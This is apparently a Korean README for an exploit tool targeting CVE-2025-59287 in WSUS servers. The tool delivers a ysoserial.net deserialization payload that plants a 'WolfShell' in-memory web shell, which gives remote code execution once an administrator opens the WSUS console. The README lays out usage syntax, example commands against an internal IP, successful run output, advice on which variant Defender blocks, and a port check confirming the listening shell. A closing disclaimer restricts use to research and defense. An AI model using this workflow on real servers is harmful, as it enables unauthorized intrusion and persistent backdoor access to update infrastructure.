
CVE-2025-59287용 익스플로잇으로, 관리자 콘솔이 열릴 때 WSUS 서버에 WolfShell 메모리 웹셸을 주입하여 원격 코드 실행을 달성합니다.
CVE-2025-59287 — WolfShell 울버린(Wolverine) 정방향 메모리 셸 주입
CVE-2025-59287은 WSUS 관련 구성 요소의 논리적 결함을 이용하여 WolfShell 메모리 셸을 대상 서버에 주입합니다. 관리자가 WSUS 콘솔을 열 때(기본적으로 1~30분 내 무작위 시간에 트리거), 메모리 셸이 트리거되어 원격 코드 실행(RCE)이 발생합니다. 본 문서에는 악용 예시, 필요 파일 및 방어 권장 사항이 포함되어 있습니다.
대상 서버에 ysoserial.net 역직렬화 페이로드를 전송합니다. 기능은 사용자 정의가 가능하며, 본 프로젝트는 울버린 메모리 셸 주입을 시연합니다.
Usage: CVE-2025-59287 <target_url> <payload_file>
CVE-2025-59287 http://192.168.50.159:8530 wolfaspx.txt
C:\Users\Administrator\Desktop\>CVE-2025-59287 http://192.168.50.159:8530 wolfshell.txt
[+] Target: http://192.168.50.159:8530/
[+] Payload read successfully, length: 20413 characters
[+] Getting Server ID...
[+] Server ID: c37d5d65-6460-4543-b7f2-f6414a3c36f9
[+] Auth cookie with Server ID...
[+] Using ID: c37d5d65-6460-4543-b7f2-f6414a3c36f9
[+] Sending event with payload...
[+] SUCCESS!
[!] RCE will trigger when you open the WSUS console!
[!] to cleanup remove the hawktrace.local computer from WSUS
CVE-2025-59287 http://192.168.50.159:8530 allow7556.txt

win2019 Defender가 차단 및 탐지하여 사용 불가

그림과 같이 7556 포트를 성공적으로 리슨하면 울버린 메모리 정방향 셸이 주입되었음을 의미합니다.


본 문서는 보안 연구 및 방어 목적으로만 제공됩니다. 관련 악용 코드를 승인되지 않은 시스템이나 공격 활동에 사용하지 마십시오.